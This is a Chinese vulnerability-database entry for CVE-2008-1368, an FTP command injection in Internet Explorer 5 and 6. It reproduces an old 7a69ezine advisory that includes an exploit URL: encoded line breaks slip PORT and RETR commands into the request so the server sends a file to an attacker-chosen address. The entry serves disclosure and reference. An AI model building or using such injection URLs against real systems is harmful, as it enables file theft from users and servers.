Microsoft Internet Explorer URL-encoded 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1187363 漏洞类型 代码注入
发布时间 2008-03-17 更新时间 2008-09-05
CVE编号 CVE-2008-1368 CNNVD-ID CNNVD-200803-259
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2008030043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200803-259
|漏洞详情
MicrosoftInternetExplorer5和6中的CRLF注入漏洞会允许远程攻击者通过一个包含FTP命令以前的URL-encodedCRLF(%0D%0A)的ftp://URL,以执行任意FTP命令。
|漏洞EXP
Hello ml,

I would like to point out that this vulnerability (Microsoft Internet 
Explorer FTP Command Injection Vulnerability)
has been published long time ago, here is the advisory:
------------------------------------
- ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#15
- ------------------------------------------------------------------
http://www.7a69ezine.org [05/12/2004]
- ------------------------------------------------------------------

Title: Internet Explorer FTP command injection

Author: Albert Puigsech Galicia - <ripe (at) 7a69ezine (dot) org [email concealed]>

Software: Microsoft Internet Explorer

Versions: >= 6.0.2800.1106

Remote: yes

Exploit: yes

Severity: Low-Medium

- ------------------------------------------------------------------

I. Introduction.

Internet Explorer is a well-known HTTP browser, and like others it can use
more protocols, for example FTP. The security historial of this navigator is
really cool and we are glad for the excelent work done by Microsoft. We love
your (in)security features.

II. Description.

In order to access to a server FTP using Internet Explorer you write
"ftp://ftpuser:ftppass@server/directory" in the directions's bar and then the
navigator connects to the server and executes the following commands (and
other that have omitted because they are not important for this stuff).

USER ftpuser
PASS ftppass
CWD /directory/

The security problem resides in which is posible to inject FTP commands on
the URL adding at the code %0a followed by your injected commands. If you do
"ftp://ftpuser:ftppass@server/directory%0asomecommand%0a" it will execute
those commands.

USER ftpuser
PASS ftppass
CWD /directory
somecommand

The last line is an erroneous command, but it's not a problem because
'somecommand' has already been executed.

III. Exploit

You need to deceive a user to go to your URL and then to introduce a valid
user and password. So yes! The explotation also requires to apply social
engineering. Then you can do a lot of things using this bug like create or
delete files and directories, but probably, the most interesting thing is to
download files. Its posible to do that using this URL;

ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

Then the server will connect to a.b.c.d and port e,f (see FTP RFC to
translate the port number) and will send the file data.

IV. Patch

Internet Explorer sucks a lot, just turn to Firefox World.

V. Timeline

01/12/2004 - Bug discovered on konqueror browser
03/12/2004 - Tried in IE. Also afected!
05/12/2004 - Advisor released

VI. Extra data

You can find more 7a69ezine advisories on this following link:

http://www.7a69ezine.org/avisos/propios [spanish info]
----------------------------------------------

Cheers,

kralor

|参考资料

来源:BID
名称:28208
链接:http://www.securityfocus.com/bid/28208
来源:BUGTRAQ
名称:20080313Rapid7AdvisoryR7-0032:MicrosoftInternetExplorerFTPCommandInjectionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/489500/100/0/threaded
来源:MISC
名称:http://www.rapid7.com/advisories/R7-0032.jsp
链接:http://www.rapid7.com/advisories/R7-0032.jsp
来源:VUPEN
名称:ADV-2008-0870
链接:http://www.frsirt.com/english/advisories/2008/0870
来源:SECUNIA
名称:29346
链接:http://secunia.com/advisories/29346
来源:SREASON
名称:3750
链接:http://securityreason.com/securityalert/3750